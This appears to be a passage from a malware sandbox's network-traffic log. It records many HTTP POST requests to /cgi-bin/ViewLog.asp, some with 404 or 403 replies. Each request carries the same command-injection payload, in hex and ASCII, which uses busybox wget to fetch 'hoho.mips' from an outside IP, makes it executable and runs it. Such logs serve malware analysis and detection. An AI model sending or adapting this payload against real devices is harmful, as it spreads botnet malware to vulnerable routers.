                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              641192.168.2.143747895.154.53.1388080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:01.679438114 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.753541946 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.001481056 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.721329927 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.841108084 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.824711084 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              642192.168.2.143778462.29.71.1378080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:01.694231033 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              643192.168.2.145329631.33.141.1998080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:01.747409105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              644192.168.2.143820631.136.146.2028080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:01.760294914 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.929476023 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:11.073137999 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:23.104652882 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              645192.168.2.144618095.85.181.2448080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:01.786427975 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              646192.168.2.145775694.121.157.1838080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:01.792483091 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              647192.168.2.143568094.121.26.2508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:01.823077917 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              648192.168.2.145865831.136.226.1178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:02.126492977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.689590931 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.809434891 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.209490061 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:10.817150116 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:19.776804924 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              649192.168.2.144699285.90.2.788080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:02.140048981 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:02.327816010 CET253INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain; charset=utf-8
                                              Vary: Accept-Encoding
                                              X-Content-Type-Options: nosniff
                                              Date: Thu, 23 Nov 2023 04:18:02 GMT
                                              Content-Length: 19
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found
                                              Nov 23, 2023 05:18:02.823025942 CET253INHTTP/1.1 404 Not Found
                                              Content-Type: text/plain; charset=utf-8
                                              Vary: Accept-Encoding
                                              X-Content-Type-Options: nosniff
                                              Date: Thu, 23 Nov 2023 04:18:02 GMT
                                              Content-Length: 19
                                              Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a
                                              Data Ascii: 404 page not found


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              650192.168.2.145106694.120.175.2398080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:02.165637970 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              651192.168.2.145686862.117.37.2268080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:02.943274975 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:03.166510105 CET165INHTTP/1.0 403 Access denied
                                              Server: tinyproxy/1.8.2
                                              Content-Type: text/html
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              652192.168.2.143777894.121.176.2168080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:02.948296070 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
